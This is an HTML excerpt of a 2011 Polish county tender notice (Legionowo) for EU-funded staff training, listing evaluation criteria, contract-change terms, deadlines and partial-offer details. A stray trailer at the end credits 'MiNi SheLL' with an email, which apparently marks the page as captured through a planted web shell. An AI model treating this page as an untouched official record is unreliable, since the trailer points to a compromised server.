<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Doświadczenie trenerów - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w następujących przypadkach:
1) zmiana trenerów wskazanych w ofercie wykonawcy na etapie realizacji zamówienia wymaga spełniania łącznie 2 warunków:
a) wskazany nowy trener musi posiadać minimum takie samo doświadczenie jak trener wskazany w ofercie Wykonawcy;
b) Zamawiający udzieli Wykonawcy pisemnej zgodę na zmianę trenera.
2) zmiana terminów przeprowadzenia poszczególnych sesji szkoleniowych uzgodnionych z wybranym Wykonawcą po podpisaniu umowy, jeżeli Zamawiający udzieli Wykonawcy pisemnej zgodę na zmianę terminu.
3) zmiana miejsca przeprowadzenia poszczególnych sesji szkoleniowych, jeżeli Zamawiający udzieli Wykonawcy pisemnej zgodę na zmianę miejsca szkolenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-legionowski.pl zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego, w Zespole ds. Zamówień Publicznych na V piętrze, pokój nr 516 w cenie 20 PLN, po uprzednim uzgodnieniu tel. 22/784 08 72.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2011 godzina 11:00, miejsce: Kancelaria na parterze Starostwa Powiatowego w Legionowie ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej w związku z realizacją projektu   Eurojakość w urzędzie - szkolenia kadry samorządowej powiatu legionowskiego gwarancją sprawnej i rzetelnej obsługi klienta.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> oferta częściowa nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji oferty częściowej nr 1 zamówienia Wykonawca zobowiązany jest zorganizować i przeprowadzić trzy szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3, 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie trenerów - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> oferta częściowa nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji zamówienia wykonawca zobowiązany jest zorganizować i przeprowadzić szkolenie MARKETING i PR W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3, 55.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com